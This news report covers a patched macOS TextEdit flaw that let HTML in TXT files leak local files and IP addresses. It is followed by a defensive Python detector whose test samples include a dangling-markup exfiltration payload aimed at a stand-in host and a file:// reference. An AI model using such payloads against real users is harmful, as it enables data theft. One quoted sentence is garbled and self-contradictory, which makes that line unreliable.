
25th April 2021, Kathmandu

Apple macOS TextEdit parsing flaw leaked local files via dangling markup injection

UPDATED A vulnerability in macOS allowed attackers to execute malicious HTML in TXT files which, if opened by victims, could leak their IP address and, worse, allow access to local files.

Now patched, the security flaw came from how TXT files were parsed by TextEdit, Apple’s open-source application that opens TXT files by default.

Despite these developments – and the 2019 discovery of memory corruption bugs that led to RCE in Microsoft’s similar text editor, Notepad – antivirus software, firewalls, and macOS Gatekeeper treat TXT files “as secure downloads that can be malicious” because they allegedly contain only text, said security researcher Paulos Yibelo in a blog post.

“They should not blindly trust TXT files,” the researcher tells The Daily Swig. Regardless of the file type, “what interprets the file and how it is interpreted means more than anything else.” TXT or another extension “can be harmful if PHP includes it as code,” he adds.
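The researcher's point that the interpreter, not the extension, decides what a file does can be turned into a content check for tools that currently wave TXT files through. The Python sketch below is an added example, not code from the researcher or from Apple; the tag and attribute lists, the `triage_txt` and `verdict` names and the sample files are assumptions constructed here.

```python
import re

# Heuristic patterns (assumptions for this sketch, not a complete HTML grammar).
TAG_RE = re.compile(rb"<\s*(?:!doctype\s+html|html|head|body|style|img|iframe|link|script|meta|base)\b", re.I)
ATTR_RE = re.compile(rb"""\b(src|href|data|action)\s*=\s*(["'])""", re.I)
URL_RE = re.compile(rb"""(?:https?|file|ftp|smb)://[^\s"'<>)]+""", re.I)


def triage_txt(data: bytes) -> dict:
    """Classify the content of a file that claims to be plain text."""
    findings = {"html_markup": False, "remote_refs": [], "local_refs": [], "dangling_attrs": []}
    findings["html_markup"] = TAG_RE.search(data) is not None
    if not findings["html_markup"]:
        return findings  # URLs in ordinary prose are not interesting on their own

    for url in URL_RE.findall(data):
        key = "local_refs" if url.lower().startswith(b"file:") else "remote_refs"
        findings[key].append(url.decode("utf-8", "replace"))

    # Dangling markup: a quoted attribute value that is never closed, or that
    # runs across a line break or a '<', so it absorbs whatever follows it.
    for m in ATTR_RE.finditer(data):
        quote = m.group(2)
        end = data.find(quote, m.end())
        value = data[m.end():end] if end != -1 else data[m.end():]
        if end == -1 or b"\n" in value or b"<" in value:
            findings["dangling_attrs"].append(m.group(1).decode().lower())
    return findings


def verdict(data: bytes) -> str:
    """Map findings to an action for a mail gateway or download scanner."""
    f = triage_txt(data)
    if f["dangling_attrs"] or f["local_refs"]:
        return "quarantine"
    if f["html_markup"]:
        return "review"
    return "plain"


# Constructed samples (not taken from the original report).
PLAIN = b"Meeting notes\nSee https://example.com/agenda for details.\n"
MARKUP = b"<!DOCTYPE html><html><body><img src=\"https://collector.example/p.png\"></body></html>"
DANGLING = b"<html><body><img src='https://collector.example/?d=\nline two of the file\n</body></html>"
LOCAL = b"<html><head><link href=\"file:///placeholder/path\" rel=\"stylesheet\"></head></html>"

if __name__ == "__main__":
    for name, blob in [("plain", PLAIN), ("markup", MARKUP), ("dangling", DANGLING), ("local", LOCAL)]:
        print(name, verdict(blob), triage_txt(blob))
```

The check is a heuristic: it flags files for closer inspection and does not replace fixing the parser that renders them.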

